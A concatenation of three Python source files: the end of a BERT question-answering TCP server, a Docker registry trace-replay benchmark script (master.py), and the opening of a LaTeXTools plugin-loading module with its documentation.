self.tokenizer = tokenizer
self.ADDR = (self.HOST,self.PORT)
self.DOC2IDX = DOC2IDX
self.STOP_CHAT = False
self.STOP_listen = False
self.predict_input_fn = None
try:
self.sock = socket(AF_INET, SOCK_STREAM)
print('%d is open' %self.PORT)
self.sock.bind(self.ADDR)
self.sock.listen(5)
# Set the exit condition
# All connected client sockets
self.clients = {}
self.thrs = {}
self.stops = []
print("before init predict_input_fn")
export_dir = FLAGS.EXPORT_PREDICT_PATH
print('export_dir:')
print(export_dir)
for x in Path(export_dir).iterdir():
print('x:')
print(x)
if('temp' in str(x)):
print('temp is in the x')
print("finish x")
subdirs = [x for x in Path(export_dir).iterdir()
if x.is_dir() and 'temp' not in str(x)]
print("After init predict_input_fn")
print(subdirs)
latest = str(sorted(subdirs)[Model_ListIndex])
print("init predict_input_fn step1")
self.predict_input_fn = tfori.contrib.predictor.from_saved_model(latest)
print("init predict_input_fn finish")
#self.predict_input_fn = tf.contrib.predictor.from_saved_model("")
except Exception as e:
print("%d has some init error" %self.PORT)
return None
def listen_client(self):
while not self.STOP_CHAT:
print(u'Waiting for connections, listening on port: %d' % self.PORT)
self.tcpClientSock, self.addr = self.sock.accept()
print(u'Connection accepted, client address:', self.addr)
while len(self.stops)!=0:
address_stop = self.stops.pop()
self.thrs[address_stop].join()
address = self.addr
# Store the established client socket in self.clients
self.clients[address] = self.tcpClientSock
# Handle each established connection in its own thread to receive and dispatch messages
self.thrs[address] = threading.Thread(target=self.readmsg, args=[address])
self.thrs[address].start()
time.sleep(0.5)
#self.tcpClientSock.send(b'you are connect...')
self.close_all()
print(u'System terminated')
def readmsg(self, address):
# If the address is unknown, return False
if address not in self.clients:
return False
# Get the client socket for this address
client = self.clients[address]
while True:
try:
# Receive the message payload into data
data = client.recv(BUFSIZ)
except Exception as e:
print(e)
self.close_client(address)
break
try:
temp = data.decode('utf8')
except:
print('data is not utf8 :%s' %(str(data)) )
self.close_client(address)
break
# Python 3 uses bytes, so the payload must be decoded/encoded
# s = '%s sent me the message: [%s] %s' % (addr[0], ctime(), data.decode('utf8'))
# Format the timestamp
ISOTIMEFORMAT = '%Y-%m-%d %X'
stime = time.strftime(ISOTIMEFORMAT, localtime())
print([address], '@',[stime],':', data.decode('utf8'))
if len(data)<1:
if self.STOP_CHAT:
break
print('data is not reasonable:')
print(data)
self.close_client(address)
break
else:
self.STOP_CHAT = (data.decode('utf8').upper() == "QUIT")
if self.STOP_CHAT:
print("quit")
self.close_client(address)
print("already quit")
break
elif data.decode('utf8') == Disconnect_KEYWORD:
print("disconnect")
self.close_client(address)
break
#tokenizer = self.tokenizer
#estimator = self.estimator
#DOC2IDX = self.DOC2IDX
question = data.decode('utf8')
#print('My question:',question)
if FLAGS.do_predict:
# define
#---------------------------------------------------
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
# ---------------------------------------------------
print('WillyTest(1)...do Set question:%s' %(FLAGS.question_type))
# ---------------------set question , changed by willy---------------------#
questions = list()
questions.append(question)
#-------------------------------------------------------------------------#
print('WillyTest(2)...do Set eval_examples')
eval_examples=set_eval_examples(questions,self.DOC2IDX)
print('WillyTest(2.1)...do FeatureWriter')
eval_writer = FeatureWriter(
predict_fn=self.predict_input_fn
)
print('WillyTest(2.2)...do convert_examples_to_features')
convert_examples_to_features(
examples=eval_examples,
tokenizer=self.tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature
)
eval_writer.close()
tf.logging.info("***** Running predictions *****")
tf.logging.info(" Num orig examples = %d", len(eval_examples))
tf.logging.info(" Num split examples = %d", len(eval_features))
tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
#print('WillyTest(5)...before redict_input_fn = input_fn_builder: eval_writer.filename=%s, FLAGS.max_seq_length=%d' %(eval_writer.filename,FLAGS.max_seq_length))
all_results = []
for result in all_results_pb:
'''
for item in result:
print(item)
print(result["unique_ids"])
'''
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(RawResult(unique_id=unique_id,start_logits=start_logits,end_logits=end_logits))
list_ans,list_text = write_predictions(
eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case
)
temp_answer = ''
if len(list_ans)==1 and len(list_text)==1:
temp_answer = 'Dr_Answer' + list_ans[0] + 'Dr_QA' + list_text[0] + '<AtenEnd>'
client.send(temp_answer.encode('utf8'))
else:
print("Willy warning: write_predictions is not valid....")
print('list_ans')
print(list_ans)
print('list_text')
print(list_text)
#clear list
eval_features.clear()
eval_examples.clear()
all_results.clear()
questions.clear()
'''
feature_spec = {
"input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"unique_ids": tf.FixedLenFeature([1], tf.int64),
}
print ("feature_spec1")
print (feature_spec)
'''
'''
feature_spec = {
"unique_ids": np.asarray(eval_features[0].unique_id).tolist(),
"input_ids": np.asarray(eval_features[0].input_ids).tolist(),
"input_mask": np.asarray(eval_features[0].input_mask).tolist(),
"segment_ids": np.asarray(eval_features[0].segment_ids).tolist()
}
print ("feature_spec2")
print (feature_spec)
'''
'''
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=[1],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
out = self.predict_input_fn({'examples':[str(feature_spec)]})
'''
'''
inputs = collections.OrderedDict()
inputs["input_ids"] = create_int_feature(features[0].input_ids)
inputs["input_mask"] = create_int_feature(features[0].input_mask)
inputs["segment_ids"] = create_int_feature(features[0].segment_ids)
inputs["unique_ids"] = create_int_feature([features[0].unique_id])
print("Do input finish")
print(inputs)
print("Before do train")
tf_example = tf.train.Example(
features=tf.train.Features(
feature=inputs
)
)
'''
'''
tf_example = tf.train.Example(
features=tf.train.Features(
{
"input_ids": create_int_feature(eval_features[0].input_ids),
"input_mask": create_int_feature(eval_features[0].input_mask),
"segment_ids":create_int_feature(eval_features[0].segment_ids),
"unique_ids": create_int_feature([eval_features[0].unique_id]),
})
)
print("Before do predict")
print('Show tf_example:')
print(tf_example)
'''
#out = self.predict_input_fn({'examples':[tf_example.SerializeToString()]})
#out = self.predict_input_fn({'examples':[str(feature_spec)]})
'''
tf_example = tf.train.Example(features=tf.train.Features(feature=inputs))
out = self.predict_input_fn({'examples':[tf_example.SerializeToString()]})
print('Output Data:')
print(out)
'''
'''
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False
)
all_results = []
print('WillyTest(6)...before estimator predict')
for result in self.estimator.predict(predict_input_fn, yield_single_examples=True):
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(RawResult(unique_id=unique_id,start_logits=start_logits,end_logits=end_logits))
print('WillyTest(8)...before write_predictions')
list_ans,list_text = write_predictions(
eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case
)
'''
def close_all(self):
try:
keys=self.clients.keys()
for address in keys:
client = self.clients.pop(address)
client.close()
time.sleep(1)
thr = self.thrs[address].pop()
thr.join()
except:
print(u'exception while closing clients')
pass
print(u'all clients have exited')
def close_client(self, address):
try:
client = self.clients.pop(address)
self.stops.append(address)
print(u'try close client')
client.close()
print(u'try close recv thread')
#thr = self.thrs[address].pop()
#thr.join()
'''
for k in self.clients:
print(u'try leave')
print(u'try client1:', [self.clients[k]])
print(u'try client2:', [self.clients[address]])
print(u'try client3:', [k])
print(u'try client4:', [address])
client = self.clients.pop(k)
#print(u'try leave1')
#self.stops.append(k)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
except:
print(u'exception while closing client')
pass
print(str(address) + u' has exited')
def main(_):
global ranker
tf.logging.set_verbosity(tf.logging.INFO)
print(willy_check_code)
print('Bert config: %s' %(FLAGS.bert_config_file))
#FLAGS.bert_config_file = 'gs://bert_willytest/bert/models/20190910-wwm-cased-40QA-SQuAD2-AtenDocQA-withoutYesNo-max_seq_length-256-doc_stride-128-learning_rate-3e-5/bert_config.json'
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.io.gfile.makedirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tfori.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
#tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
# FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tfori.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tfori.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=tfori.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
if FLAGS.do_retriever:
# Set Document
# ------------------------------------------------------
print('WillyTest...do SQlite')
DOC2IDX, docments = read_sqlite_documents(input_file=FLAGS.db_file)
# ------------------------------------------------------
else:
# Set Document
tf.logging.info("my document_type is %s", FLAGS.document_type)
if FLAGS.document_type == 'Text':
# TODO
print('WillyTest...do Text')
docments = read_text_documents(input_file=FLAGS.predict_file)
elif FLAGS.document_type == 'SQuAD':
# TODO
print('WillyTest...do SQuAD')
docments = read_squad_documents(input_file=FLAGS.predict_file)
# else:
# #raise ValueError("Your document_type: %s is undefined or wrong, please reset it." %(FLAGS.document_type))
if FLAGS.Save_PB_Model == True:
def serving_input_receiver_fn():
feature_spec = {
"input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"unique_ids": tf.FixedLenFeature([], tf.int64),
}
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=FLAGS.predict_batch_size,
name='input_example_tensor')
'''
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=[1],
name='input_example_tensor')
'''
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
print('Init checkpoint: %s' %FLAGS.init_checkpoint )
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
FLAGS.use_tpu = False
estimator = tfori.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
estimator._export_to_tpu = False ## !!important to add this
estimator.export_saved_model(
export_dir_base = FLAGS.EXPORT_PATH,
serving_input_receiver_fn = serving_input_receiver_fn)
'''
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
estimator._export_to_tpu = False ## !!important to add this
estimator.export_saved_model(
export_dir_base = FLAGS.EXPORT_PATH,
serving_input_receiver_fn = serving_input_receiver_fn)
'''
else:
print("do tcp server")
ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
tserver = None
tserver = TcpServer(tokenizer,DOC2IDX)
while tserver == None:
tserver = TcpServer( tokenizer,DOC2IDX)
print("do tcp server-listen")
tserver.listen_client()
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
|
master.py
|
import sys
import socket
import os
from argparse import ArgumentParser
import requests
import time
import datetime
import pdb
import random
import threading
import multiprocessing
import json
import yaml
from dxf import *
from multiprocessing import Process, Queue
import importlib
import hash_ring
from mimify import repl
## get requests
def send_request_get(client, payload):
## Read from the queue
s = requests.session()
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
s.post("http://" + str(client) + "/up", data=json.dumps(payload), headers=headers, timeout=100)
def send_warmup_thread(requests, q, registry):
trace = {}
dxf = DXF(registry, 'test_repo', insecure=True)
for request in requests:
if request['size'] < 0:
trace[request['uri']] = 'bad'
try:
dgst = dxf.push_blob(request['data'])
except:
dgst = 'bad'
print request['uri'], dgst
trace[request['uri']] = dgst
q.put(trace)
#######################
# send to registries according to cht
# warmup output file is <uri to dgst > map table
# only consider 'get' requests
# let set threads = n* len(registries)
#######################
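# A worked example of the slot assignment below (values are illustrative):
# with registries = [r0, r1, r2] and threads = 6, a GET whose layer hashes to
# registry index 1 is placed in process_data[(1 + 3*i) % 6], i.e. slot 1 or 4
# depending on the running request counter i, so each registry's requests are
# spread over threads/len(registries) worker processes.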
def warmup(data, out_trace, registries, threads, numclients):
trace = {}
processes = []
q = Queue()
process_data = []
# nannan
# request distribution is based on consistent hashing (CHT), where the key is the blob digest.
# process_data = [[] [] [] [] [] [] [] ... []threads]
# r1 r2 r3 r1 r2 r3
ring = hash_ring.HashRing(registries)
for i in range(threads):
process_data.append([])
i = 0
for request in data:
if request['method'] == 'GET':
uri = request['uri']
layer_id = uri.split('/')[-1]
registry_tmp = ring.get_node(layer_id) # which registry should store this layer/manifest?
idx = registries.index(registry_tmp)
process_data[(idx+(len(registries)*i))%threads].append(request)
print "layer: "+layer_id+"goest to registry: "+registry_tmp+", idx:"+str(idx)
i += 1
for regidx in range(len(registries)):
for i in range(0, threads, len(registries)):
p = Process(target=send_warmup_thread, args=(process_data[regidx+i], q, registries[regidx]))
processes.append(p)
for p in processes:
p.start()
for i in range(threads):
d = q.get()
for thing in d:
if thing in trace:
if trace[thing] == 'bad' and d[thing] != 'bad':
trace[thing] = d[thing]
else:
trace[thing] = d[thing]
for p in processes:
p.join()
with open(out_trace, 'w') as f:
json.dump(trace, f)
#############
# NANNAN: change `onTime` for distributed dedup response
#
##############
def stats(responses):
responses.sort(key = lambda x: x['time'])
endtime = 0
data = 0
latency = 0
total = len(responses)
onTimes = 0
failed = 0
wrongdigest = 0
startTime = responses[0]['time']
for r in responses:
# if r['onTime'] == 'failed':
if "failed" in r['onTime']:
total -= 1
failed += 1
continue
if r['time'] + r['duration'] > endtime:
endtime = r['time'] + r['duration']
latency += r['duration']
data += r['size']
if r['onTime'] == 'yes':
onTimes += 1
if r['onTime'] == 'yes: wrong digest':
wrongdigest += 1
duration = endtime - startTime
print 'Statistics'
print 'Successful Requests: ' + str(total)
print 'Failed Requests: ' + str(failed)
print 'Wrong digest requests: '+str(wrongdigest)
print 'Duration: ' + str(duration)
print 'Data Transferred: ' + str(data) + ' bytes'
print 'Average Latency: ' + str(latency / total)
print '% requests on time: ' + str(1.*onTimes / total)
print 'Throughput: ' + str(1.*total / duration) + ' requests/second'
def serve(port, ids, q, out_file):
server_address = ("0.0.0.0", port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind(server_address)
sock.listen(len(ids))
except:
print "Port already in use: " + str(port)
q.put('fail')
quit()
q.put('success')
i = 0
response = []
print "server waiting"
while i < len(ids):
connection, client_address = sock.accept()
resp = ''
while True:
r = connection.recv(1024)
if not r:
break
resp += r
connection.close()
try:
info = json.loads(resp)
if info[0]['id'] in ids:
info = info[1:]
response.extend(info)
i += 1
except:
print 'exception occurred in server'
pass
with open(out_file, 'w') as f:
json.dump(response, f)
print 'results written to ' + out_file
stats(response)
## Get blobs
def get_blobs(data, clients_list, port, out_file):
processess = []
ids = []
for d in data:
ids.append(d[0]['id'])
serveq = Queue()
server = Process(target=serve, args=(port, ids, serveq, out_file))
server.start()
status = serveq.get()
if status == 'fail':
quit()
## Lets start processes
i = 0
for client in clients_list:
p1 = Process(target = send_request_get, args=(client, data[i], ))
processess.append(p1)
i += 1
print "starting client ..."
for p in processess:
p.start()
for p in processess:
p.join()
server.join()
######
# NANNAN: trace_file+'-realblob.json'
######
def get_requests(files, t, limit):
ret = []
for filename in files:
with open(filename+'-realblob.json', 'r') as f:
requests = json.load(f)
for request in requests:
method = request['http.request.method']
uri = request['http.request.uri']
if (('GET' == method) or ('PUT' == method)) and (('manifest' in uri) or ('blobs' in uri)):
size = request['http.response.written']
if size > 0:
timestamp = datetime.datetime.strptime(request['timestamp'], '%Y-%m-%dT%H:%M:%S.%fZ')
duration = request['http.request.duration']
client = request['http.request.remoteaddr']
blob = request['data']
r = {
'delay': timestamp,
'uri': uri,
'size': size,
'method': method,
'duration': duration,
'client': client,
'data': blob
}
ret.append(r)
ret.sort(key= lambda x: x['delay'])
begin = ret[0]['delay']
for r in ret:
r['delay'] = (r['delay'] - begin).total_seconds()
if t == 'seconds':
begin = ret[0]['delay']
i = 0
for r in ret:
if r['delay'] > limit:
break
i += 1
print i
return ret[:i]
elif t == 'requests':
return ret[:limit]
else:
return ret
def absoluteFilePaths(directory):
absFNames = []
for dirpath,_,filenames in os.walk(directory):
for f in filenames:
absFNames.append(os.path.abspath(os.path.join(dirpath, f)))
return absFNames
####
# Random match
# the output file is the last trace filename-realblob.json, which is total trace file.
####
def match(realblob_locations, trace_files):
print realblob_locations, trace_files
blob_locations = []
tTOblobdic = {}
blobTOtdic = {}
ret = []
i = 0
for location in realblob_locations:
absFNames = absoluteFilePaths(location)
print "Dir: "+location+" has the following files"
print absFNames
blob_locations.extend(absFNames)
for trace_file in trace_files:
with open(trace_file, 'r') as f:
requests = json.load(f)
for request in requests:
method = request['http.request.method']
uri = request['http.request.uri']
if len(uri.split('/')) < 3:
continue
layer_id = uri.rsplit('/', 1)[1]
usrname = uri.split('/')[1]
repo_name = uri.split('/')[2]
if (('GET' == method) or ('PUT' == method)) and (('manifest' in uri) or ('blobs' in uri)):
size = request['http.response.written']
if size > 0:
if i < len(blob_locations):
blob = blob_locations[i]
if layer_id in tTOblobdic.keys():
continue
if blob in blobTOtdic.keys():
continue
tTOblobdic[layer_id] = blob
blobTOtdic[blob] = layer_id
size = os.stat(blob).st_size
r = {
"host": request['host'],
"http.request.duration": request['http.request.duration'],
"http.request.method": request['http.request.method'],
"http.request.remoteaddr": request['http.request.remoteaddr'],
"http.request.uri": request['http.request.uri'],
"http.request.useragent": request['http.request.useragent'],
"http.response.status": request['http.response.status'],
"http.response.written": size,
"id": request['id'],
"timestamp": request['timestamp'],
'data': blob
}
print r
ret.append(r)
i += 1
with open(trace_file+'-realblob.json', 'w') as fp:
json.dump(ret, fp)
##############
# NANNAN: round_robin is false!
# "http.request.duration": 1.005269323,
# "http.request.uri": "v2/4715bf52/437c49db/blobs/93054319",
# "host": "dc118836",
# "http.request.useragent": "docker/17.03.1-ce go/go1.7.5 git-commit/c6d412e kernel/4.4.0-78-generic os/linux arch/amd64 UpstreamClient(Docker-Client/17.03.1-ce \\(linux\\))",
# "timestamp": "2017-06-20T02:41:18.399Z",
# "id": "ed29d65dbd",
# "http.response.written": 9576,
# "http.response.status": 200,
# "http.request.method": "GET",
# "http.request.remoteaddr": "0ee76ffa"
##############
def organize(requests, out_trace, numclients, client_threads, port, wait, registries, round_robin, push_rand, replay_limits=0):
organized = []
if round_robin is False:
ring = hash_ring.HashRing(range(numclients))
with open(out_trace, 'r') as f:
blob = json.load(f)
for i in range(numclients):
organized.append([{'port': port, 'id': random.getrandbits(32), 'threads': client_threads, 'wait': wait, 'registry': registries, 'random': push_rand}])
print organized[-1][0]['id']
i = 0
cnt = 0
for r in requests:
cnt += 1
if replay_limits > 0:
if cnt > replay_limits:
break
request = {
'delay': r['delay'],
'duration': r['duration'],
'data': r['data']
}
if r['uri'] in blob:
b = blob[r['uri']]
if b != 'bad':
request['blob'] = b # dgest
request['method'] = 'GET'
if round_robin is True:
organized[i % numclients].append(request)
i += 1
else:
organized[ring.get_node(r['client'])].append(request)
else:
request['size'] = r['size']
request['method'] = 'PUT'
if round_robin is True:
organized[i % numclients].append(request)
i += 1
else:
organized[ring.get_node(r['client'])].append(request)
return organized
def main():
parser = ArgumentParser(description='Trace Player, allows for anonymized traces to be replayed to a registry, or for caching and prefetching simulations.')
parser.add_argument('-i', '--input', dest='input', type=str, required=True, help='Input YAML configuration file, should contain all the inputs required for processing')
parser.add_argument('-c', '--command', dest='command', type=str, required=True, help='Trace player command. Possible commands: warmup, run, simulate. Warmup is used to populate the registry with the layers of the trace, run replays the trace, and simulate is used to test different caching and prefetching policies.')
args = parser.parse_args()
config = file(args.input, 'r')
try:
inputs = yaml.load(config)
except Exception as inst:
print 'error reading config file'
print inst
exit(-1)
verbose = False
if 'verbose' in inputs:
if inputs['verbose'] is True:
verbose = True
print 'Verbose Mode'
if 'trace' not in inputs:
print 'trace field required in config file'
exit(1)
trace_files = []
if 'location' in inputs['trace']:
location = inputs['trace']['location']
if '/' != location[-1]:
location += '/'
for fname in inputs['trace']['traces']:
trace_files.append(location + fname)
else:
trace_files.extend(inputs['trace']['traces'])
if verbose:
print 'Input traces'
for f in trace_files:
print f
limit_type = None
limit = 0
if 'limit' in inputs['trace']:
limit_type = inputs['trace']['limit']['type']
if limit_type in ['seconds', 'requests']:
limit = inputs['trace']['limit']['amount']
else:
print 'Invalid trace limit_type: limit_type must be either seconds or requests'
exit(1)
elif verbose:
print 'limit_type not specified, entirety of trace files will be used.'
if 'output' in inputs['trace']:
out_file = inputs['trace']['output']
else:
out_file = 'output.json'
if verbose:
print 'Output trace not specified, ./output.json will be used'
generate_random = False
if args.command != 'simulate':
if "warmup" not in inputs or 'output' not in inputs['warmup']:
print 'warmup not specified in config, warmup output required. Exiting'
exit(1)
else:
interm = inputs['warmup']['output']
if 'random' in inputs['warmup']:
if inputs['warmup']['random'] is True:
generate_random = True
registries = []
if 'registry' in inputs:
registries.extend(inputs['registry'])
#NANNAN
if args.command == 'match':
if 'realblobs' in inputs['client_info']:
realblob_locations = inputs['client_info']['realblobs']
match(realblob_locations, trace_files)
return
else:
print "please write realblobs in the config files"
return
# replay_limits = 0
# if 'debugging' in inputs['client_info']:
# if inputs['client_info']['debugging'] is True:
# replay_limits = inputs['client_info']['debugging']['limits']
json_data = get_requests(trace_files, limit_type, limit)
if args.command == 'warmup':
if verbose:
print 'warmup mode'
if 'threads' in inputs['warmup']:
threads = inputs['warmup']['threads']
else:
threads = 1
if verbose:
print 'warmup threads: ' + str(threads)
# NANNAN: not sure why only warmup a single registry, let's warmup all.
warmup(json_data, interm, registries, threads, generate_random)
elif args.command == 'run':
if verbose:
print 'run mode'
if 'client_info' not in inputs or inputs['client_info'] is None:
print 'client_info required for run mode in config file'
print 'exiting'
exit(1)
if 'port' not in inputs['client_info']:
if verbose:
print 'master server port not specified, assuming 8080'
port = 8080
else:
port = inputs['client_info']['port']
if verbose:
print 'master port: ' + str(port)
if 'threads' not in inputs['client_info']:
if verbose:
print 'client threads not specified, 1 thread will be used'
client_threads = 1
else:
client_threads = inputs['client_info']['threads']
if verbose:
print str(client_threads) + ' client threads'
if 'client_list' not in inputs['client_info']:
print 'client_list entries are required in config file'
exit(1)
else:
client_list = inputs['client_info']['client_list']
if 'wait' not in inputs['client_info']:
if verbose:
print 'Wait not specified, clients will not wait'
wait = False
elif inputs['client_info']['wait'] is True:
wait = True
else:
wait = False
round_robin = True
if 'route' in inputs['client_info']:
if inputs['client_info']['route'] is True:
round_robin = False
data = organize(json_data, interm, len(client_list), client_threads, port, wait, registries, round_robin, generate_random)
## Perform GET
get_blobs(data, client_list, port, out_file)
elif args.command == 'simulate':
if verbose:
print 'simulate mode'
if 'simulate' not in inputs:
print 'simulate file required in config'
exit(1)
pi = inputs['simulate']['name']
if '.py' in pi:
pi = pi[:-3]
try:
plugin = importlib.import_module(pi)
except Exception as inst:
print 'Plugin did not work!'
print inst
exit(1)
try:
if 'args' in inputs['simulate']:
plugin.init(json_data, inputs['simulate']['args'])
else:
plugin.init(json_data)
except Exception as inst:
print 'Error running plugin init!'
print inst
if __name__ == "__main__":
main()
|
latextools_plugin.py
|
'''
Plugin auto-discovery system intended for use in LaTeXTools package.
Overview
========
A plugin is a Python class that extends LaTeXToolsPlugin and provides some
functionality, usually via a function, that LaTeXTools code interacts with.
This module provides mechanisms for loading such plugins from arbitrary files
and configuring the environment in which they are used. It tries to make as
few assumptions as possible about how the consuming code and the plugin
interact. At its heart it is just a plugin registry.
A quick example plugin:
from latextools_plugin import LaTeXToolsPlugin
class PluginSample(LaTeXToolsPlugin):
def do_something():
pass
And example consuming code:
from latextools_plugin import get_plugin
plugin = get_plugin('plugin_sample')
# instantiate and use the plugin
plugin().do_something()
Note that we make no assumption about how plugins are used, just how they are
loaded. It is up to the consuming code to provide a protocol for interaction,
i.e., methods that will be called, etc.
As shown above, plugin authors should import and sub-class the
`LaTeXToolsPlugin` class from this module, as this will ensure the plugin is
properly registered and so available to consuming code. Plugins are registered
by using a version of the class name, so it is important that all plugins used
have a unique class name. The conversion is similar to how Sublime handles
*Command objects, so the name is converted from CamelCase to snake_case. In
addition, the word "Plugin", if it occurs at the end of the class name, is
removed.
Consuming code loads a plugin from the registry by passing the converted plugin
name to the `get_plugin()` function defined in this class. What is returned is
the class itself, i.e., it is the responsibility of the consuming code to
initialize the plugin and then interact with it.
Finding Plugins
===============
The following loading mechanisms for plugins are provided, either using
configuration options or the `add_plugin_path()` function defined in this
module.
Configuration options:
`plugin_paths`: in the standard user configuration.
A list of either directories to search for plugins or paths to
plugins.
Defaults to an empty list, in which case nothing will be done.
Paths can either be specified as absolute paths, paths relative to the
LaTeXTools package or paths relative to the User package. Paths in the
User package will mask paths in the LaTeXTools package. This is
intended to emulate the behaviour of ST.
If the default glob of *.py is unacceptable, the path can instead be
specified as a tuple consisting of the path and the glob to use. The
glob *must* be compatible with the Python glob module. E.g.,
```json
"plugin_paths": [['latextools_plugins', '*.py3']]
```
will load all .py3 files in the `latextools_plugins` subdirectory of
the User package.
API:
`add_plugin_path()`: can be used in a manner similar to the `plugin_paths`
configuration option. Its required argument is the path to be search, which
can be specified either relative to the LaTeXTools package, the User
package or as an absolute path. In addition it takes an optional argument
of the glob to use to identify plugin files. The main purpose is to allow
LaTeXTools code to register a default location to load plugins from.
The Plugin Environment
======================
The plugin environment will be setup so that the directory containing the
plugin is the first entry on sys.path, enabling import of any modules located
in the same folder, according to standard Python import rules. In addition, the
standard modules available to Sublime Text are available. Furthermore, a small
number of modules from LaTeXTools itself can be made available. This list of
modules can be configured either through the `plugins_whitelist` configuration
option in the settings file or by using the `add_whitelist_module()` function
defined in this module.
Configuration options:
`plugins_whitelist`:
A list of LaTeXTools module names to be made available via sys.modules
when loading plugins. These names do not need to be the fully
qualified name, but should be the name of the module relative to the
LaTeXTools folder (i.e. "latextools_utils" rather than
"LaTeXTools.latextools_utils") as this ensures compatibility between
ST2 and ST3.
API:
`add_whitelist_module()`: can be used in a manner similar to the
`plugins_whitelist` option described above, i.e. called with the name of a
module to add to the list of modules available in sys.modules when a
LaTeXTools plugin is loaded. The optional argument, `module`, if used
should be a Python module object (normally obtained from `sys.modules`).
This is primarily intended to expose a module that would not otherwise be
available or expose an already available module to plugins under a
different name.
'''
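# A minimal usage sketch based on the docstring above (plugin and path names
# are illustrative):
#
#   import latextools_plugin
#   latextools_plugin.add_whitelist_module('latextools_utils')
#   latextools_plugin.add_plugin_path('latextools_plugins', glob='*.py')
#   plugin_cls = latextools_plugin.get_plugin('plugin_sample')
#   plugin_cls().do_something()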
from __future__ import print_function
import sublime
import glob as _glob
import os
import sys
import threading
import traceback
from contextlib import contextmanager
from collections import MutableMapping
try:
from latextools_utils import get_setting
import latextools_plugin_internal as internal
except ImportError:
from .latextools_utils import get_setting
from . import latextools_plugin_internal as internal
__all__ = [
'LaTeXToolsPlugin', 'get_plugin', 'get_plugins_by_type',
'add_plugin_path', 'LaTeXToolsPluginException', 'InvalidPluginException',
'NoSuchPluginException'
]
# this is used to load plugins and not interfere with other modules
_MODULE_PREFIX = '_latextools_'
# -- Public API --#
# exceptions
class LaTeXToolsPluginException(Exception):
'''
Base class for plugin-related exceptions
'''
pass
class NoSuchPluginException(LaTeXToolsPluginException):
'''
Exception raised if an attempt is made to access a plugin that does not
exist
Intended to allow the consumer to provide the user with some more useful
information e.g., how to properly configure a module for an extension point
'''
pass
class InvalidPluginException(LaTeXToolsPluginException):
'''
Exception raised if an attempt is made to register a plugin that is not a
subclass of LaTeXToolsPlugin.
'''
pass
LaTeXToolsPlugin = internal.LaTeXToolsPlugin
# methods for consumers
def add_plugin_path(path, glob='*.py'):
'''
This function adds plugins from a specified path.
It is primarily intended to be used by consumers to load plugins from a
custom path without needing to access the internals. For example, consuming
code could use this to load any default plugins
`glob`, if specified should be a valid Python glob. See the `glob` module.
'''
if (path, glob) not in internal._REGISTERED_PATHS_TO_LOAD:
